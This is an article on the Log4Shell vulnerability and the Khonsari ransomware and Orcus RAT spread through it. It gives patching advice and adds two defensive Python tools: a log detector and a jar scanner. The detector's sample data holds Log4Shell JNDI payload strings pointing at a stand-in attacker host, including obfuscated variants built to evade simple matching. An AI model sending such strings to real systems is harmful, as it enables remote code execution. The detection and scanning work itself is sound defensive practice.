A new type of ransomware and a Remote Access Trojan (RAT) have been discovered being installed via the log4j vulnerability, also known as “Log4Shell.” Log4Shell, tracked as CVE-2021-44228, is a vulnerability in the log4j module, which is used extensively for logging in Java-based applications. The vulnerability allows a remote attacker to send a specially crafted payload that, when the receiving server logs it, triggers log4j's lookup function, which then fetches and executes a file from a remote location. The result is that an attacker can execute arbitrary code on the targeted server.
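The mechanism above, a string that is merely logged and yet triggers a lookup, is what a defender can hunt for in existing logs. The following is an added example, not code from the article or from any vendor: a small Python detector that normalises the nested lower/upper/default-value lookups log4j evaluates before the outer lookup, then flags any line whose resolved form contains a JNDI lookup. The log lines and the `attacker.example` host are constructed for the demo.

```python
import re

# Constructed sample log lines for the demo (not taken from the article). Three are
# ordinary requests; three carry a lookup string of the kind Log4Shell abuses, and two
# of those hide the "jndi" token behind nested lookups so that a plain substring match
# for "${jndi:" would miss them.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET /api/items?id=42 HTTP/1.1" 200 "curl/7.79"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://attacker.example/b}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/c}"',
    '10.0.0.3 - - "GET /price?x=${hostName} HTTP/1.1" 200 "-"',
]

# Inner lookups that log4j evaluates before the outer one: ${lower:X} -> x,
# ${upper:x} -> X, and ${key:-default} -> default (the key may be empty, as in ${::-j}).
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# After normalisation, what matters is any lookup whose prefix is "jndi".
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve nested lower/upper/default-value lookups innermost-first until stable."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def is_suspicious(line: str) -> bool:
    """True when the line contains a JNDI lookup, even one hidden behind nested lookups."""
    return bool(_JNDI.search(normalize_lookups(line)))


def scan(lines):
    """Return (index, normalised_line) for every line flagged as suspicious."""
    return [(i, normalize_lookups(line)) for i, line in enumerate(lines) if is_suspicious(line)]


if __name__ == "__main__":
    for idx, shown in scan(SAMPLE_LOG_LINES):
        print(f"line {idx}: {shown}")
```

Running it flags lines 2, 3 and 4 and prints each in its resolved form, which is what an analyst wants to see in an alert. The normaliser only covers the three lookup types shown; string matching of this kind is a detection aid for triage and hunting, not a control that makes an unpatched server safe.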
The new ransomware, called Khonsari, targets vulnerable Java applications running on Windows operating systems. The ransomware uses the Log4Shell vulnerability to force the victim system to download an additional payload, which is the main Khonsari ransomware payload. This malicious .NET binary then executes and encrypts all drives on the device, as well as all of the user’s personal directories, such as the Desktop and Downloads folders. The ransomware uses AES-128 in CBC mode for the encryption and adds the extension “.khonsari” to each file. As is typical of ransomware, a ransom note is then created that instructs the user to send the threat actor Bitcoin in order to get their files decrypted.
Researchers have also seen a RAT being installed via the Log4Shell vulnerability. This RAT, called Orcus, follows an infection pattern similar to that of the Khonsari ransomware: the Log4Shell vulnerability is used to force the victim to download and execute a secondary payload, which is the main Orcus malware dropper. From there, the Orcus malware establishes persistence via the Run registry key, then downloads shellcode from an external site and injects it into the conhost.exe process. The payload then starts beaconing to its command-and-control server, completing the infection.
The relative ease of exploiting Log4Shell makes it a prime target for threat actors, so it is likely that more types of malware will be deployed using this vulnerability.
Due to the ease of exploitation and the widespread use of the log4j module, Log4Shell is an extremely severe vulnerability. Organizations should identify the applications that are affected, especially any externally facing ones, and patch them as soon as possible. This task can be difficult, however, because some applications have nested dependencies that include the vulnerable log4j modules, making it hard to determine everything that is affected. For any application that cannot be patched immediately, it is recommended to set the “formatMsgNoLookups” flag within log4j to true, as this helps mitigate the attack. As with all ransomware and other forms of malware, it is important to maintain up-to-date security controls on endpoints and to routinely back up systems in case they need to be recovered. The number and variety of malware seen being executed via this attack will only continue to increase, so reducing the attack surface and hardening systems will be key to preventing a major incident at any organization.
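The nested-dependency problem described above is why looking at declared dependencies is not enough: log4j-core is often shaded inside a fat jar, war or ear that the build manifest never mentions. The following is an added example, not code from the article or from the Apache project: a Python scanner that walks a directory tree, opens every archive, looks for the `JndiLookup.class` entry that carries the vulnerable lookup, reads the bundled Maven `pom.properties` for the version, and recurses into archives nested inside archives. The fixture it builds in a temporary directory (a plain log4j-core jar, a fat jar nesting it, and a clean jar) is constructed for the demo; the version string 2.14.1 is used because that release is affected.

```python
import io
import os
import tempfile
import zipfile

# Entry names as laid out in a real log4j-core jar and its Maven metadata.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def _inspect_archive(data: bytes, label: str, findings: list) -> None:
    """Inspect one archive held in memory and recurse into any archive nested in it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container: nothing to inspect
    with zf:
        names = set(zf.namelist())
        if JNDI_LOOKUP_CLASS in names:
            version = "unknown"
            if POM_PROPERTIES in names:
                props = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
                for raw in props.splitlines():
                    if raw.startswith("version="):
                        version = raw.split("=", 1)[1].strip()
            findings.append((label, version))
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                # "outer!inner" labels show exactly where the copy is shaded.
                _inspect_archive(zf.read(name), f"{label}!{name}", findings)


def scan_tree(root: str) -> list:
    """Return (location, version) for every log4j-core copy found under root."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                with open(path, "rb") as fh:
                    _inspect_archive(fh.read(), rel, findings)
    return sorted(findings)


def _make_jar(entries: dict) -> bytes:
    """Build an in-memory zip from {entry_name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_fixture(root: str) -> None:
    """Constructed test data: a plain log4j-core jar, a fat jar nesting it, a clean jar."""
    core = _make_jar({
        JNDI_LOOKUP_CLASS: b"\xca\xfe\xba\xbe",  # placeholder bytes, not a real class
        POM_PROPERTIES: "version=2.14.1\n",
    })
    fat = _make_jar({"BOOT-INF/lib/log4j-core-2.14.1.jar": core, "com/example/App.class": b""})
    clean = _make_jar({"com/example/Util.class": b""})
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    for name, data in (("lib/log4j-core-2.14.1.jar", core), ("app.jar", fat), ("lib/util.jar", clean)):
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)


def demo() -> list:
    """Build the fixture in a temp dir, scan it, and return what was found."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return scan_tree(root)


if __name__ == "__main__":
    for location, version in demo():
        print(f"{location}: log4j-core {version}")
```

Both copies are reported, including the one hidden under `BOOT-INF/lib` inside `app.jar`, which a directory listing alone would never show. Where a copy cannot be upgraded right away, the flag the text mentions can be set as the JVM system property `log4j2.formatMsgNoLookups=true`; it applies to log4j 2.10 through 2.14.1 only, and Apache later documented that it does not cover every configuration, so treat it as a stopgap until the patched release is deployed.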